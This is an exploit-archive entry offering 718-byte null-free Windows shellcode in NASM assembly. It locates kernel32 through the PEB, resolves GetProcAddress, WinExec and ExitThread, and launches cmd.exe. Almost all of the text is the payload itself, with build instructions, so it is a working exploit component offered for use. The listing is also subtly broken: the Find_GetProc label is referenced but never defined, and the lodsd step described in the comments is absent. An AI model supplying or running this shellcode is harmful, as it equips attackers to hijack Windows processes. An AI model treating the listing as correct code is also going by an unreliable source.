Windows x32 / Windows x64 - cmd.exe Shellcode (718 bytes)

Author: Filippo Bersani Published: 2017-05-18 Verified: Verified



;Full tutorial: [#Windows CMD shellcode]
 ;nasm.exe [-f win32] dynamic.asm -o dynamic.obj
 ;SKIP -f win32 to create the .obj file to extract eventually the hex code
 ;then execute: [python dynamic.obj] to get the hex code:
 ;you can download the python script here:
 ;GoLink.exe /console /entry _start dynamic.obj
 ;Tested and coded on Win10 Home edition 64, tested also on: Win7 EE 32, Win Srv 2012 R2 64
[BITS 32]
[SECTION .text]
global _start
xor ecx, ecx            ; trick to avoid null byte MOV EAX,[FS:0x30], we add ecx
MOV EAX, [FS:ecx+0x30]  ; EAX = PEB
MOV EAX, [eax+0x0C]     ; EAX = PEB->Ldr
MOV EAX, [EAX+0x1C]     ; EAX = PEB->Ldr.InInitializationOrderModuleList.Flink
                        ; Start to move the pointer 2 positions ahead
mov eax, [eax+ecx]      ;  EAX = LDR 2nd entry -> KernelBA * + ecx to avoid NULL
mov eax, [eax+ecx]      ;  EAX = LDR 3rd entry -> Kernel32
                        ; End move
MOV EBX, [EAX+8]        ; EBX = LDR_MODULE's BaseAddress Kernel32
;Find the EXPORT TABLE of kernel32.dll
mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew (offset 60)
add edx, ebx          ; EDX = PE Header (1)
mov edx, [edx + 0x78] ; EDX = Offset export table (offset 120)
add edx, ebx          ; EDX = Export table (data type IMAGE_EXPORT_DIRECTORY) (2), we will use this value later (*)
mov esi, [edx + 0x20] ; ESI = Relative offset to AddressOfNames
add esi, ebx          ; ESI = AddressOfNames (3)         
;Find GetProcAddress function name (the ordinal)
inc ecx                              ; Increment the counter (we start from 1)
                                     ; lodsd instruction will follow the pointer specified by the ESI register and set result in the EAX, this means that after the lodsd
                                     ; instruction we will have the offset of the current name function in EAX.
                                     ; the instruction will also increment the esi register value with 4, so ESI will already point to next function name offset
add eax, ebx                        ; Get function name (offset + base a)
cmp dword [eax], 0x50746547         ; PteG ->search first 4 bytes of the string GetProcAddre in little-endian format
jnz Find_GetProc
cmp dword [eax + 0x4], 0x41636f72   ; Acor ->other 4 bytes
jnz Find_GetProc
cmp dword [eax + 0x8], 0x65726464   ; erdd ->other 4 bytes. At this point even without checking the last 2 bytes (ss) of the function name we assume it is GetProcAddress
jnz Find_GetProc
dec ecx                             ; we start counting from 1 but the adrress index start from 0 so we need to decrement ECX
                                    ; now ECX points to the array index of AddressOfNames and we can obtain the ordinal value in this way: AddressOfNameOrdinals[ecx] = ordinal
;Find the address of GetProcAddress function
mov esi, [edx + 0x24]    ; ESI = Offset to AddressOfNameOrdinals (4)(*)
add esi, ebx             ; ESI = AddressOfNameOrdinals
mov cx, [esi + ecx * 2]  ; CX (lower word of ECX 16bit) = AddressOfNameOrdinals contains two byte numbers value (the ordinal), so we only need of the lower word of ECX
                         ;  CX (16bit == 2byte). This value is the link (the index) to the AddressOfFunctions
                         ;  so CX now points to the Number of function (ordinal) that corresponds to the GetProcAddress address value in the AddressOfFunctions
mov esi, [edx + 0x1c]    ; ESI = Offset to AddressOfFunctions (5)
add esi, ebx             ; ESI = AddressOfFunctions
mov edx, [esi + ecx * 4] ; EDX = Offset to GetProcAddress function address: AddressOfFunctions[ecx*4]
                         ;  We set ecx * 4 because each address pointer has 4 bytes reserved and ESI points to the beginning of AddressOfFunctions array
add edx, ebx             ; EDX = GetProcAddress
mov esi, edx             ; store GetProcAddress in ESI
;Finding address of Winexec calling GetProcAddress(base kernel32,"Winexec\0")
xor ecx,ecx
push ecx
;another trick to avoid null bytes: prefix the Winexec string with A to keep the stack aligned without null
;we load AWinexec
push 0x63657845
push 0x6e695741
mov ecx,esp
lea ecx, [ecx+1] ; get rid of 41(A)
push ecx    ; Winexec\0
push ebx    ; Base kernel32
call esi    ;Call GetProcAddress: the return result is saved in EAX
xchg edi,edx
mov edi, eax;save Winexec address in EDI
;Finding address of ExitThread calling GetProcAddress(base kernel32,"ExitThread\0")
xor ecx,ecx
push ecx
;the same trick used before for WinExec
PUSH 0x64616572
PUSH 0x68547469
PUSH 0x78454141
mov ecx,esp
lea ecx, [ecx+2] ; get rid of 4141(AA) 
push ecx    ; ExitThread\0 
push ebx    ; Base kernel32
call esi    ;Call GetProcAddress: the return result is saved in EAX
mov esi, eax;save ExitThread address in esi (overwrite GetProcAddress since we don't need anymore)
;Finally call cmd.exe\0
xor ecx,ecx
push ecx
push 0x20657865
push 0x2e646d63
mov ecx,esp ; "cmd.exe \0"
push 0x1    ; windows style
push ecx
call edi    ; WinExec("cmd.exe \0",1)
;exit clean
xor ecx,ecx
push ecx
call esi    ; ExitThread(0)